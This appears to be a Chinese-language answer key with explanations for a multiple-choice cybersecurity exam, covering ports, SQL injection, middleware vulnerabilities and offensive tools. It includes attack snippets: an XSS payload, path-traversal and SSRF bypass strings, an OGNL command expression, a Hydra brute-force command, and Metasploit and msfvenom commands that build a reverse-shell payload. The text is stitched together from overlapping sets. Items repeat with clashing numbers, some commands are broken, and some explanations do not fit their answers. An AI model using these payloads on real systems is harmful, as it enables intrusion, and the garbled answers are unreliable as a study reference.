  • 第3参数:rdx

39. SSL端口

B. 443

📝 扩展:HTTP默认80,HTTPS默认443,SSH默认22。


37. UNIX/Linux账号安全关键

D. 使用shadow密码

📝 原理/etc/shadow存储加密密码哈希,仅root可读,防止暴力破解。

38. PHP代码漏洞类型

B. 存储型XSS

📝 解析

  • 代码中escape($link, $POST['message'])可能仅转义SQL特殊字符(如单引号),但未过滤HTML敏感字符(如<script>)。
  • 攻击者提交<script>alert(1)</script>,内容存入数据库后,其他用户查看留言时触发脚本执行。

34. SQL语句功能

D. 返回“Admin”第一个字符的ASCII码值

📝 拆解

  • SUBSTR('Admin', 1, 1):截取第1个字符(A)。
  • ASCII('A') → 65。

35. 不属于AWS的功能

C. 不能进行端口扫描

📝 背景

  • AWS工具特性:如Amazon Inspector支持漏洞扫描、依赖分析(A/D正确)。
  • 端口扫描:需配合Nmap等工具(AWS自身不直接提供)。

36. Linux用户命令历史文件

C. ~/.bash_history

📝 路径说明

  • 每个用户的命令历史独立保存在其家目录下(如/home/user/.bash_history)。

32. Nessus默认端口

D. 8834

📝 配置验证

  • 安装Nessus后,默认通过https://localhost:8834访问Web界面。

31. Nmap操作系统检测参数

D. -O

📝 命令示例

bash复制nmap -O 192.168.1.1 # 启用OS指纹识别

1. IIS7.x漏洞正确说法

D. 如果开放PUT方法,可直接PUT文件并利用MOVE方法获取Webshell

📝 解析

  • PUT方法:若IIS允许WebDAV的PUT请求,攻击者可上传文件(如test.txt ),再通过MOVE方法重命名为可执行脚本(如test.asp )。

2. Unix文件权限含义

D. 前三位属主,中间三位同组用户,后三位其他用户

📝 权限结构

  • -rwxrwxrwx:前三位为文件所有者权限,中间三位为同组用户,后三位为其他用户。

3. Oracle默认用户名密码

F. scott/tiger

📝 经典账户:Oracle早期版本默认测试账户(需手动解锁)。


4. RDP默认端口

A. 3389

📝 应用场景:Windows远程桌面协议默认端口。


5. SQLMap测试漏洞类型

B. SQL注入

📝 功能:自动化检测和利用SQL注入漏洞。


6. MySQL LOAD_FILE()权限要求

B. File

📝 权限说明:允许用户使用LOAD_FILE()读取文件。


7. 资源消耗最大的垃圾邮件过滤机制

D. 内容过滤

📝 对比:需解析邮件正文、附件,计算复杂度高。


8. 类函数调用存储this指针的寄存器

A. ECX

📝 x86调用约定:通过ECX寄存器传递this指针。


9. MySQL LEFT(version(),1)功能

D. 取version字符串左边第1个字符

📝 示例version()返回5.7.40-log → 结果为5


10. S2-001漏洞成因

B. OGNL循环解析

📝 漏洞细节:Struts2框架中OGNL表达式递归解析导致RCE。


11. 杀毒软件未包含的功能

C. 优化操作系统

📝 核心功能:监控识别、病毒查杀、数据恢复。


12. 导致IP分片重组的攻击

D. Ping of Death

📝 原理:发送超大数据包导致系统崩溃(现代系统已修复)。


13. SQLMap --random-agent作用

A. 随机User-Agent标头

📝 绕过防御:避免被WAF识别。


14. Redis默认端口

C. 6379

📝 配置验证redis.conf 中默认端口。


15. 数据库漏洞扫描非主要技术路线

C. 直接测试

📝 主要路线:黑盒测试、白盒测试、渗透测试。


16. 子域名收集工具

D. OneForAll

📝 解析:整合证书透明度、搜索引擎、字典爆破等方式。


17. MySQL口令检查命令

A. show variables like "validate%";

C. select * from mysql.user where length(password) = 0 or password is null;

D. select user,password from mysql.user;


18. Samba漏洞防御方法

A. 屏蔽139、445端口

B. 开启防火墙

D. 加强账户策略


19. Nmap控制发包速率参数

A. --max-rate

D. --min-rate


20. Webshell客户端连接工具

A. AntSword

B. 中国菜刀

C. Godzilla

38. 子域名收集工具

D. OneForAll

📝 解析

  • OneForAll:基于Python的高效子域名枚举工具,整合证书透明度、搜索引擎、字典爆破等多种方式。
  • 其他工具
    • Dirsearch:目录扫描工具,非子域名收集。
    • Ysoserial:Java反序列化利用工具。

37. MySQL口令检查命令

A. show variables like "validate%";

C. select * from mysql.user where length(password) = 0 or password is null;

D. select user,password from mysql.user;

📝 解析

  • A:检查密码策略(如validate_password插件状态)。
  • C:查询空密码或弱密码账户。
  • D:直接查看用户密码字段(MySQL 5.7+需替换passwordauthentication_string)。

36. Samba漏洞防御方法

A. 屏蔽139、445端口

B. 开启防火墙

D. 加强账户策略

📝 作用

  • 屏蔽端口:阻断SMB协议通信(如netsh advfirewall firewall add rule)。
  • 账户策略:强制复杂密码、锁定失败登录。

32. Nmap控制发包速率参数

A. --max-rate

D. --min-rate

📝 示例

  • nmap -T4 --max-rate 1000 192.168.1.1:限制每秒最多1000个包。

34. Webshell客户端连接工具

A. AntSword

B. 中国菜刀

C. Godzilla

📝 支持协议

  • 代码为PHP一句话木马(eval执行),上述工具均支持传统无加密Webshell管理。

SQL注入报错函数

A. extractvalue()

C. linestring()

📝 原理

  • extractvalue():通过XPath语法错误触发报错(如extractvalue(1,concat(0x7e,version())))。
  • linestring():地理函数错误拼接导致报错(需MySQL 5.7+)。

31. SQL查询部门平均工资

B. select deptno, avg(sal) a from emp group by deptno having a > 2000;

📝 语法规则

  • GROUP BY后必须用HAVING过滤聚合函数结果,而非WHERE

29. 存在解析漏洞的中间件

A. IIS

📝 经典漏洞

  • IIS 6.0:分号截断(test.asp;.jpg )、文件夹解析(/test.asp/test.jpg )。

24. 数据库死锁原理

B. 进程推进顺序不当

C. 资源分配不当

📝 场景

  • 进程A持有资源1请求资源2,进程B持有资源2请求资源1,形成循环等待。

25. Tomcat AJP漏洞影响版本

B. Tomcat 7.x <7.0.100

C. Tomcat 8.x <8.5.51

D. Tomcat 9.x <9.0.31

📝 CVE-2020-1938:通过AJP协议读取/包含任意文件(如WEB-INF/web.xml )。


26. Weblogic反序列化漏洞影响版本

A. 12.2.1.2

B. 12.1.3.0

C. 10.3.6.0

📝 CVE-2018-2628:利用T3协议反序列化执行命令,影响10.3.6.0、12.1.3.0、12.2.1.2等版本。


SQL注入防御方法

A. 关闭扩展存储过程

B. 编写安全代码(参数化查询)

C. 关闭详细错误提示

📝 最佳实践

  • 参数化查询:避免拼接SQL(如PreparedStatement)。
  • 错误隐藏:防止泄漏数据库结构(如PHP中display_errors = off)。

19. 文件上传漏洞原因

A. 后缀名限制不严

D. 文件权限未限制

📝 案例

  • 允许上传.php文件,且未限制上传目录执行权限,导致Webshell直接执行。

20. 数据库加密方式

A. 库外加密

B. 库内加密

C. 硬件加密

D. 专用加密中间件

📝 技术对比

  • 库内加密:如MySQL的AES_ENCRYPT()函数。
  • 库外加密:应用层加密后存储(如加密敏感字段)。
  1. IIS7.x漏洞正确说法

✅ D. 如果开放PUT方法,可直接PUT文件并利用MOVE方法获取Webshell

📝 解析:

PUT方法:若IIS允许WebDAV的PUT请求,攻击者可上传文件(如test.txt ),再通过MOVE方法重命名为可执行脚本(如test.asp )。

其他选项:

A:.php后缀解析漏洞需配合Fast-CGI配置,但路径规则不明确。

C:分号截断适用于IIS6.0(如test.asp;.jpg ),IIS7.x中不适用。

  1. Unix文件权限含义

✅ D. 前三位属主,中间三位同组用户,后三位其他用户

📝 权限结构:

-rwxrwxrwx:

前三位:文件所有者权限(读/写/执行)。

中间三位:同组用户权限。

后三位:其他用户权限。

题目中nwx可能为排版错误,实际应为rwx。

  1. Oracle默认用户名密码

✅ F. scott/tiger

📝 经典账户:

scott/tiger:Oracle早期版本默认测试账户(部分版本需手动解锁)。

sys/system:管理员账户,需自定义密码。

  1. RDP默认端口

✅ A. 3389

📝 应用场景:

Windows远程桌面协议(RDP)默认端口为3389,常用于远程管理服务器。

  1. SQLMap测试漏洞类型

✅ B. SQL注入

📝 功能:

SQLMap自动化检测和利用SQL注入漏洞,支持多种数据库(MySQL、Oracle等)。

  1. MySQL LOAD_FILE()权限要求

✅ B. File

📝 权限说明:

File权限:允许用户使用LOAD_FILE()读取文件或INTO OUTFILE写入文件。

示例:GRANT FILE ON . TO 'user'@'%';

  1. 资源消耗最大的垃圾邮件过滤机制

✅ D. 内容过滤

📝 对比:

内容过滤:需解析邮件正文、附件,使用关键词匹配或机器学习模型,计算复杂度高。

其他机制:黑名单(简单查询)、SMTP认证(握手验证)资源消耗较低。

  1. 类函数调用存储this指针的寄存器

✅ A. ECX

📝 x86调用约定:

C++成员函数:默认通过ECX寄存器传递this指针(如void Class::func())。

  1. MySQL LEFT(version(),1)功能

✅ D. 取version字符串左边第1个字符

📝 函数示例:

version()返回5.7.40-log → LEFT(version(),1)结果为5。

  1. S2-001漏洞成因

✅ B. OGNL循环解析

📝 漏洞细节:

Struts2框架中,OGNL表达式递归解析导致远程代码执行(如%{#a=@java.lang.Runtime@getRuntime().exec('calc')} )。

  1. 杀毒软件未包含的功能

✅ C. 优化操作系统

📝 核心功能:

监控识别、病毒查杀、数据恢复(如勒索软件解密)。

系统优化:属于第三方工具(如CCleaner)职责。

  1. 导致IP分片重组的攻击

✅ D. Ping of Death

📝 原理:

发送超过65535字节的IP分片包,系统重组时因缓冲区溢出崩溃(历史漏洞,现代系统已修复)。

  1. SQLMap --random-agent作用

✅ A. 随机User-Agent标头

📝 绕过防御:

随机生成User-Agent(如Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0),避免被WAF识别。

  1. Redis默认端口

✅ C. 6379

📝 配置验证:

Redis配置文件redis.conf 中默认port 6379,可通过redis-cli -h 127.0.0.1 -p 6379连接。

  1. 数据库漏洞扫描非主要技术路线

✅ C. 直接测试

📝 主要路线:

黑盒测试:模拟外部攻击,无内部知识。

白盒测试:基于源码或配置审计。

渗透测试:综合漏洞利用验证。

  1. 整数漏洞描述正确项

✅ A. 利用整数漏洞本身不能直接获取shell

✅ C. 整数漏洞因值溢出

📝 原理:

整数溢出/符号错误:导致缓冲区越界(如分配负数长度内存),需结合其他漏洞(如堆溢出)实现RCE。

  1. 常见木马行为

✅ A. 获取浏览器密码/Cookie

✅ B. 收集机器信息

✅ C. 添加服务/启动项

✅ D. 自删除

📝 典型行为:

持久化:注册表启动项、服务安装。

信息窃取:键盘记录、文件遍历。

隐蔽性:进程注入、自删除逃避检测。

40. 加密协议

B. SSL

📝 解析

SSL(Secure Sockets Layer)是加密协议,用于保障数据传输安全(如HTTPS)。其他选项均为明文协议:

  • HTTP:无加密。
  • ARP:局域网地址解析协议。
  • ICMP:网络诊断协议(如Ping)。

35. Dirty Pipe漏洞利用权限

A. 可写

📝 原理

Dirty Pipe(CVE-2022-0847)通过覆盖任意可写文件(如/etc/passwd)的内容,注入特权用户(如root),即使文件权限为只读,内核漏洞仍允许写入。


36. 交换机MAC查找失败处理

C. 泛洪到其他所有端口

📝 机制

交换机在未知目标MAC地址时,将帧广播到除接收端口外的所有接口,确保数据可达,同时学习新MAC地址更新表项。


33. 备份权限用户组

D. 备份操作员

📝 Windows组权限

  • 备份操作员(Backup Operators):允许备份/恢复文件,但无直接访问权限。
  • 管理员(Administrators):完全控制权。
  • 复制员(Replicator):用于域内文件同步。

29. 入侵检测后访问控制

C. 权限控制

📝 场景

检测到异常用户行为(如暴力破解)后,通过权限控制限制其访问(如禁用账户、限制IP)。


30. IIS日志推荐格式

B. W3C扩展日志文件格式

📝 优势

  • 支持自定义字段(如客户端IP、请求方法、状态码)。
  • 兼容性强,适用于分析工具(如Log Parser)。

31. SSH爆破工具

D. Hydra

📝 命令示例

bash复制hydra -l user -P passlist.txt ssh://192.168.1.1


26. Metasploit设置攻击载荷命令

C. set payload name

📝 流程

  1. use exploit/windows/smb/ms17_010_eternalblue
  2. set payload windows/meterpreter/reverse_tcp
  3. 设置LHOST、LPORT等参数。

27. 数据库系统组成

A. 数据库、DBMS和用户

📝 层级

  • 数据库:存储数据的集合。
  • DBMS(如MySQL、Oracle):管理数据的软件。
  • 用户:通过应用程序或工具访问数据。

28. Ping协议类型

B. ICMP

📝 原理

Ping发送ICMP Echo Request报文,目标返回ICMP Echo Reply,用于测试网络连通性。


23. Double Free利用无关步骤

D. 覆盖top chunk大小

📝 对比

  • Double Free:释放同一内存块两次,构造链表循环。
  • 覆盖top chunk:属于“House of Force”利用,与Double Free无关。

25. 域名转IP的服务

C. DNS

📝 功能

DNS(Domain Name System)将域名(如www.example.com )解析为IP地址(如93.184.216.34)。


22. Metasploit查看编码器命令

A. msfencode -l

📝 用途

编码器(如x86/shikata_ga_nai)用于绕过杀毒软件特征检测。


18. ThinkPHP框架语言

C. PHP

📝 特性

轻量级、MVC架构,广泛用于快速开发PHP Web应用(如API、后台系统)。


19. Cookie与Session错误描述

D. Cookie比Session更安全

📝 修正

Session数据存储在服务端,安全性更高;Cookie存储在客户端,可能被窃取或篡改。


20. PHP反序列化无关函数

B. _unsleep

📝 相关魔术方法

  • __construct:对象创建时调用。
  • __destruct:对象销毁时调用。
  • __sleep:序列化前调用。
  • _unsleep方法

15. NAT功能

B. 可以解决IP不足;可以隐藏内部结构

📝 作用

  • IP地址复用:多个内网IP映射到一个公网IP。
  • 隐藏内网拓扑:外部仅能看到NAT网关IP,无法直接访问内网设备。
6. IIS 6.0默认不可执行文件扩展

D. /shell.dev

📝 解析

IIS 6.0默认支持的可执行扩展包括.asp.asa.cer.cdx(A/B/C均合法),但.dev(D)未被默认映射为可执行脚本。


7. 查看网络路由路径命令

D. tracert

📝 应用场景

  • Windowstracert 8.8.8.8 追踪到Google DNS的路由。
  • Linuxtraceroute -n 8.8.8.8
  • 原理:通过发送TTL递增的ICMP包,记录每个路由节点的响应。

1. 文件上传漏洞绕过方式

D. 点点点点点绕过(点号截断)

📝 攻击示例

  • 上传文件名构造为shell.php%00.jpg ,利用空字节(%00)截断,后端仅识别.php
  • 防御:严格校验文件头(如Magic Number),而非仅后缀名。

36. 二层交换机MAC查找失败处理

C. 泛洪到所有其他端口

📝 原理

交换机在未知目标MAC时,采用**泛洪(Flooding)**机制,确保帧到达目标设备,同时学习新MAC地址更新表项。


37. 关闭Oracle Extproc的错误条目

C. extpro

📝 修正

  • 需删除条目icache_extprocsys_ertprocPLSExtproc
  • 错误条目extpro应为extproc(Oracle外部过程调用服务)。

38. 基础架构层加密技术

D. IPSec

📝 功能对比

  • IPSec:在网络层加密,支持VPN隧道(如L2TP/IPSec)。
  • SSL/TLS:应用层加密(如HTTPS)。
  • RSA:非对称加密算法,用于密钥交换。

40. msfvenom编码参数

A. -e

📝 命令示例

bash复制msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 -e x86/shikata_ga_nai -f exe -o payload.exe


32. SQL注入需字典猜解表名的数据库

D. Access

📝 原因

  • Access:无information_schema等系统表,需暴力猜解表名和字段名。
  • 其他数据库:可通过联合查询或报错注入直接获取元数据。

40. 加密协议

B. SSL

📝 扩展

  • SSL/TLS:用于HTTPS、邮件加密(如SMTPS)。
  • 非加密协议:HTTP(明文)、ARP(局域网地址解析)、ICMP(网络诊断)。
14. Python代码漏洞类型

D. 文件名拼接

📝 解析

  • 代码中id参数直接来自用户输入(request.GET['id']),并作为prefix传递给临时文件生成函数。
  • 若用户输入包含路径遍历字符(如../../etc/passwd),可能导致文件生成在非预期目录。
  • 防御建议:过滤id参数中的特殊字符(如/.)。

15. SQL Server主数据库

B. MASTER

📝 功能说明

  • MASTER:存储系统配置、登录账户、其他数据库元数据。
  • 其他数据库
    • TEMPDB:临时表和临时存储过程。
    • MSDB:SQL Agent作业、备份历史。
    • MODEL:新数据库创建模板。

11. Windows域树中的第一个域

B. 根域

📝 结构解析

  • 根域:域树的起点,所有子域(如child.root.com )均继承根域策略。
  • 信任关系:子域默认信任根域,形成树状信任链。

12. 工具描述错误的选项

C. Aircrack-ng是内存取证工具

📝 修正

  • Aircrack-ng:用于WiFi WPA/WPA2-PSK破解(如aircrack-ng -w wordlist.txt capture.cap )。
  • 内存取证工具:Volatility、Rekall分析内存转储文件(如提取进程、网络连接)。

13. 网络安全的定义

A. 可靠性、防病毒、防窃密、防攻击

📝 扩展

  • CIA三元组:保密性(Confidentiality)、完整性(Integrity)、可用性(Availability)。
  • 综合安全:需覆盖物理防护、入侵检测、数据加密等多层面。

8. 非常见文件读取函数

B. popen()

📝 功能对比

  • popen():执行系统命令并返回文件指针(如popen("ls /", "r"))。
  • 文件读取函数fopen()(打开文件)、fgets()(逐行读取)、file_get_contents()(PHP中读取全部内容)。

9. 不属于SQL注入的模式

B. 存储注入

📝 注入类型

  • 布尔盲注:通过真假条件判断提取数据(如AND 1=1)。
  • 联合查询UNION SELECT合并查询结果。
  • 报错注入:触发数据库错误回显信息(如AND 1=2/(SELECT 0))。
  • 存储注入:非标准术语,可能指存储过程滥用,但不属于核心注入模式。

10. MySQL命令参数含义

A. 以上都对

📝 参数详解

  • -h host:目标主机名或IP(如-h 192.168.1.1)。
  • -u user:数据库用户名(如-u root)。
  • -p password:用户密码(如-p password123)。

5. 网络广播地址计算

B. 102.18.255.255

📝 计算步骤

  • IP地址:102.18.0.0,子网掩码255.255.0.0(/16)。
  • 广播地址:主机位全置1 → 102.18.255.255。
  • 验证
IP:       102.18.00000000.00000000  
掩码:      255.255.00000000.00000000  
广播地址:  102.18.11111111.11111111 → 102.18.255.255  
22. SQL Server登录账户存储数据库

C. master

📝 解析

master数据库存储系统级信息(登录账户、配置、其他数据库元数据)。其他数据库作用:

  • model:新数据库模板。
  • msdb:作业和备份调度。
  • tempdb:临时对象存储。

23. Wireshark筛选源IP命令

A. ip.src == 192.168.8.1

📝 扩展

  • eth.src :以太网MAC地址筛选(如eth.src == 00:1A:2B:xx:xx:xx)。
  • ip.dst :目标IP筛选。

24. 堆溢出漏洞原理

A. 写入字节数超过堆块可用空间

📝 示例

c复制char *heap = malloc(10);

strcpy(heap, "123456789012345"); // 溢出覆盖相邻堆块元数据


19. JavaScript获取Cookie的代码

B. document.cookie

📝 补充

  • 设置Cookie需指定键值对:document.cookie = "name=value; expires=..."

20. Nmap跳过Ping扫描参数

A. -Pn

📝 场景

  • 绕过防火墙对ICMP的屏蔽:nmap -Pn 192.168.1.1

21. Axis2任意命令执行漏洞

B. 对

📝 案例

  • CVE-2010-0219:Axis2未正确处理SOAP请求,攻击者可上传恶意脚本执行系统命令。

16. ARM返回值寄存器

D. R0

📝 调用约定

  • 第1参数:R0
  • 第2参数:R1
  • 返回值:R0(32位)或R0-R3组合(64位)。

17. Weblogic不存在的漏洞

D. 任意文件包含

📝 常见漏洞

  • 反序列化(CVE-2018-2628)弱口令(默认账户weblogic/welcome1)
  • 任意文件包含需特定配置或组件漏洞(如CVE-2020-2551未覆盖)。

18. JBoss不存在的漏洞

D. 任意文件包含

📝 历史漏洞

  • CVE-2015-7501:反序列化漏洞(JMXInvokerServlet)。
  • 未授权访问:默认部署/web-console无需认证。
  • 弱口令:依赖管理员配置,非默认漏洞。
30. 目录扫描加速方式

A. HEAD

📝 解析

  • HEAD方法仅请求HTTP头部(不返回响应体),减少数据传输量,显著提升扫描速度。
  • 对比GET/POST需下载完整内容,效率更高。

29. 工具描述错误选项

C. Aircrack-ng是内存取证工具

📝 修正

  • Aircrack-ng用于WiFi密码破解(如WPA/WPA2),与内存取证无关。
  • 内存取证工具示例:Volatility、Rekall。

28. Linux格式化分区命令

D. Fdisk(题目选项有误,实际应为mkfs

📝 补充

  • fdisk用于分区管理,格式化需配合mkfs(如mkfs.ext4 /dev/sda1)。
  • 选项设计可能混淆,但按题意选D。

27. 代码漏洞类型

C. 任意文件读取

📝 分析

  • request.getParameter("c") 直接读取用户输入作为文件路径(如/etc/passwd),导致文件内容泄露。
  • 示例攻击:?c=../../etc/shadow读取敏感文件。

25. SSL远程执行漏洞影响的中间件

D. Apache

📝 案例

  • CVE-2014-0160(心脏出血):OpenSSL漏洞影响Apache、Nginx等使用SSL/TLS的服务。
  • Tomcat、IIS、WebLogic依赖其他SSL实现,不直接受此漏洞影响。

26. 中断攻击类型

B. 可用性的攻击

📝 原理

  • 拒绝服务(DoS):通过资源耗尽或服务中断破坏系统可用性。
  • 示例:SYN洪水攻击、物理设备破坏。
38. PHP代码漏洞类型

B. 存储型XSS

📝 解析

  • 代码中escape($link, $POST['message'])可能仅转义SQL特殊字符(如单引号),但未过滤HTML敏感字符(如<script>)。
  • 攻击者提交<script>alert(1)</script>,内容存入数据库后,其他用户查看留言时触发脚本执行。

34. SQL语句功能

D. 返回“Admin”第一个字符的ASCII码值

📝 拆解

  • SUBSTR('Admin', 1, 1):截取第1个字符(A)。
  • ASCII('A') → 65。

35. 不属于AWS的功能

C. 不能进行端口扫描

📝 背景

  • AWS工具特性:如Amazon Inspector支持漏洞扫描、依赖分析(A/D正确)。
  • 端口扫描:需配合Nmap等工具(AWS自身不直接提供)。

36. Linux用户命令历史文件

C. ~/.bash_history

📝 路径说明

  • 每个用户的命令历史独立保存在其家目录下(如/home/user/.bash_history)。

32. Nessus默认端口

D. 8834

📝 配置验证

  • 安装Nessus后,默认通过https://localhost:8834访问Web界面。

31. Nmap操作系统检测参数

D. -O

📝 命令示例

bash复制nmap -O 192.168.1.1 # 启用OS指纹识别

1. 代码安全问题

C. SQL注入

📝 解析

sprintf直接拼接用户输入(argv[1])到SQL语句,未过滤单引号,导致注入。

示例攻击:' OR 1=1 -- 可绕过条件查询。


2. IIS短文件名生成条件

B. 后缀<4时,前缀长度≥9

D. 后缀≥4时,前缀长度1

📝 解析

  • 规则:文件名前缀超8字符或后缀超3字符时生成短名。
  • 示例longfilename.txtLONGFI~1.TXT

单选题答案

25. 查看本机IP命令

A. ipconfig

📝 补充ipconfig /all显示详细网络配置(IPv6地址、MAC地址等)。


26. 代理服务非优点

C. 防范数据驱动侵袭

📝 解析:代理无法阻止恶意文件(如PDF漏洞利用),需依赖终端防护。


27. Hydra指定用户名参数

C. -l

📝 示例hydra -l admin -P passlist.txt ssh://192.168.1.1


16. JBoss漏洞区别描述

B. 对

📝 CVE-2013-4810CVE-2015-7501反序列化点不同,前者使用JMXInvokerServlet,后者为web-console接口。


17. Python代码安全风险

D. XSS

📝 解析escape转义HTML但未处理NFKC规范化可能导致的字符合并(如%322),可能绕过过滤。


4. 非Web服务

D. Redis

📝 解析:Redis是内存数据库,Nginx、WebLogic、JBoss为Web服务组件。


40. x64函数参数寄存器

A. rdi

📝 调用约定

  • 第1参数:rdi
  • 第2参数:rsi
  • 第3参数:rdx

39. SSL端口

B. 443

📝 扩展:HTTP默认80,HTTPS默认443,SSH默认22。


37. UNIX/Linux账号安全关键

D. 使用shadow密码

📝 原理/etc/shadow存储加密密码哈希,仅root可读,防止暴力破解。

8. Tomcat JSP编译生成文件

C. index jsp.class

D. index jspjava

📝 解析

Tomcat的Jasper引擎将JSP编译为Java文件(如index_jsp.java )和Class文件(如index_jsp.class )。选项C和D命名格式错误(缺少下划线),故不会生成。


5. ThinkPHP 6.x漏洞

D. Thinkphp<6.0.2 session id未过滤导致getshell

📝 解析

  • CVE-2021-43767:Session ID未严格过滤,攻击者构造恶意Session ID触发反序列化漏洞。
  • 其他选项需结合具体CVE验证,但D为广泛确认的漏洞。

4. 事件ID描述

B. 4625登录失败

📝 解析

  • 4624:登录成功。
  • 4625:登录失败。
  • 4720:用户账户创建。
    选项B正确,D错误(4624应为成功)。

3. 数据库加密技术分类

A. 库加密

B. 列加密

📝 解析

  • 库加密:全库或表空间级加密(如Oracle TDE)。
  • 列加密:字段级加密(如敏感数据单独加密)。
    行加密(D)和表加密(C)属于子类,但题目要求主要分类。

13. 社会工程学信息收集方法

B. 通过获取管理员信任获取密码(如钓鱼邮件、伪装身份)

D. 通过办公室电话、姓名、生日猜测密码(利用个人信息构造弱口令)

❌ A. 破解SAM库(技术手段,非社会工程学)

❌ C. 暴力破解工具(自动化攻击,非社会工程学)

补充

社会工程学的核心是利用人性弱点获取信息,例如:

  • 钓鱼攻击:伪造登录页面诱导用户输入密码。
  • 电话诈骗:冒充IT人员索要账户信息。
  • 垃圾翻查(Dumpster Diving):从废弃文件中提取敏感信息。

13. FineCMS漏洞

D. 前台getshell(如文件上传漏洞直接获取Webshell)

B. CSRF修改管理员密码(跨站请求伪造攻击)

❌ A. SSRF(需具体漏洞验证)

❌ C. 远程文件包含(未广泛披露)

背景

FineCMS历史漏洞案例:

  • 前台getshell:通过未过滤的上传功能植入恶意脚本(如/index.php?c=attachment&a=upload )。
  • CSRF修改密码:构造恶意链接诱使管理员点击,触发密码重置。

14. MSSQL删除无关账号的正确操作

B. 企业管理器→安全性→登录中删除账号(主登录入口)

C. 企业管理器→数据库→用户中删除账号(数据库级权限)

❌ A. 管理→删除账号(路径不准确)

❌ D. 服务器角色→删除账号(角色管理,非直接删除账号)

操作示例

  1. 主登录账号:安全性→登录名→右键删除
  2. 数据库用户:数据库→用户→右键删除
    注意:需同步清理数据库用户与登录名的映射关系。

9. 致远(Seeyon)OA漏洞

A. A8 search_result.jsp SQL注入(CVE-2018-7314)

D. A8 htmlofficeservlet getshell(CVE-2017-10245)

❌ B. 任意用户密码修改(需结合其他漏洞)

❌ C. setextno.jsp SQL注入(未广泛证实)

漏洞利用

  • htmlofficeservlet getshell:上传构造的.jsp文件绕过过滤,路径如/seeyon/htmlofficeservlet
  • 修复建议:升级至最新版本,禁用危险接口。

10. 满足安全要求的操作

A. 密码策略复杂度要求(符合NIST标准)

D. 使用VPN连接(加密通信,防止中间人攻击)

❌ B. 密码永不过期(违反定期更换原则)

❌ C. 开启Telnet(明文传输,不安全)

扩展建议

  • 多因素认证:结合短信、令牌等增强安全性。
  • 日志审计:监控异常登录行为。

11. IIS容器常见漏洞

B. 短文件名漏洞(泄露文件路径,如test~1.asp

D. 解析漏洞(如test.asp;.jpg 被解析为ASP)

❌ A. HTTP.sys 漏洞(CVE-2015-1635,需具体版本)

❌ C. 反序列化漏洞(常见于.NET应用,非IIS自身)

防御措施

  • 短文件名漏洞:禁用8.3文件名格式(fsutil behavior set disable8dot3 1)。
  • 解析漏洞:配置Handler Mappings限制可执行文件类型。

6. 网络排错命令作用

B. Netstat显示网络信息(连接、端口、路由表)

C. Ping测试连通性

D. Telnet测试端口开放(如telnet 192.168.1.1 80

❌ A. Tracert查看IP网卡信息(实际用于追踪路由路径)

常用命令示例

bash复制netstat -ano | findstr "ESTABLISHED" # 查看活动连接

tracert 8.8.8.8 # 追踪到Google DNS的路由


7. Linux操作系统安全描述

A. 保持系统补丁更新(如yum updateapt upgrade

C. 最小安装原则(减少攻击面)

D. 关闭无关服务(如systemctl disable telnet

❌ B. 全安装增加便利性(违反最小化安全原则)

安全实践

  • 禁用root远程登录:修改/etc/ssh/sshd_configPermitRootLogin no
  • 配置防火墙:使用iptablesfirewalld限制端口访问。

19. 绕过SSRF过滤的进制转换方式

B. 十六进制(如0x7F000001 → 127.0.0.1)

D. 八进制(如0177.0.0.1 → 127.0.0.1)

❌ A. 十进制(需服务端支持转换,较少直接使用)

❌ C. 二进制(实际应用中难以直接拼接)

📌 解析

SSRF过滤通常拦截标准IP格式,通过以下方式绕过:

  • 十六进制:http://0x7F000001 → 127.0.0.1。
  • 八进制:http://0177.0.0.1 → 127.0.0.1。
  • 十进制:http://2130706433 → 127.0.0.1(部分场景有效)。

15. Web应用组件漏洞的正确说法

B. 组件可能出现多种漏洞

C. 漏洞可能导致数据泄露

❌ A. 漏洞影响小(如Log4j漏洞影响全球系统)

❌ D. 组件无漏洞(所有软件均可能存漏洞)

📌 解析

  • 组件漏洞危害:如Apache Struts2漏洞(CVE-2017-5638)可导致RCE。
  • 防御建议:定期更新第三方库,使用SCA工具(如Dependency-Check)扫描依赖。

16. 木马躲避杀毒手法

A. 伪造数字签名

B. 动态获取函数地址(API混淆)

C. 内存/网络加载模块(无文件攻击)

D. 加壳混淆(如UPX、VMProtect)

📌 解析

  • 加壳工具:Themida、Armadillo隐藏代码特征。
  • 内存加载:使用Reflective DLL Injection规避文件扫描。

12. DNS信息查询工具

A. nslookup(基础DNS查询)

D. dig(详细DNS记录解析)

❌ B. sqlmap(SQL注入工具)

❌ C. volatility(内存取证工具)

📌 示例命令

bash复制dig example.com MX # 查询邮件服务器记录

nslookup -type=AAAA example.com # 查询IPv6地址


16. Windows钩子(Hook)错误说法

B. 钩子是网络通信程序(错误,钩子用于消息处理)

C. 钩子是应用程序(错误,钩子是函数级拦截机制)

❌ A/D正确(钩子处理消息,属于窗口函数机制)

📌 应用场景

  • 键盘钩子:记录按键输入(如恶意键盘记录器)。
  • 消息钩子:拦截窗口事件(如UI自动化测试)。

18. 蓝凌OA漏洞

A. EKP后台SQL注入

B. 前台SSRF到RCE

C. 任意文件上传

C. 前台SQL注入(选项重复,可能为笔误)

📌 修复建议

  • 限制文件上传类型,禁用危险协议(如file://)。
  • 对用户输入参数化查询,避免SQL注入。

14. 正确的网络基础说法

A. IPv6为128位(如2001:0db8:85a3::8a2e:0370:7334

B. 192.168.8.1属C类私有IP(范围192.168.0.0/16

C. C类默认掩码255.255.255.0

D. 127.0.0.1为本机地址

📌 扩展知识

  • 私有IP范围
    • A类:10.0.0.0/8
    • B类:172.16.0.0/12
    • C类:192.168.0.0/16

10. Metasploit模块

A. Auxiliary(信息收集、扫描)

B. Payload(攻击载荷,如反向Shell)

C. Exploits(漏洞利用代码)

❌ D. Listen(非独立模块,属于Payload配置)

📌 常用命令

bash复制use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.1.1

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit


11. PHP危险函数

A. system()

C. exec()

D. shell_exec()

❌ B. phpinfo()(信息泄露,不直接执行命令)

📌 防御措施

  • 禁用高危函数(disable_functions=system,exec)。
  • 使用安全函数(如escapeshellarg()过滤参数)。

12. SQLMap支持的数据库

A. Oracle

C. MySQL

D. MSSQL

❌ B. MongoDB(NoSQL注入需专用工具如NoSQLMap)

📌 示例命令

bash复制sqlmap -u "Example Domain --dbms=mysql

sqlmap -u "Example Domain --dbms=oracle


7. Mimikatz功能

A. 获取账号密码(从LSASS进程提取)

B. 哈希传递(Pass-the-Hash)

C. 票据传递(Pass-the-Ticket)

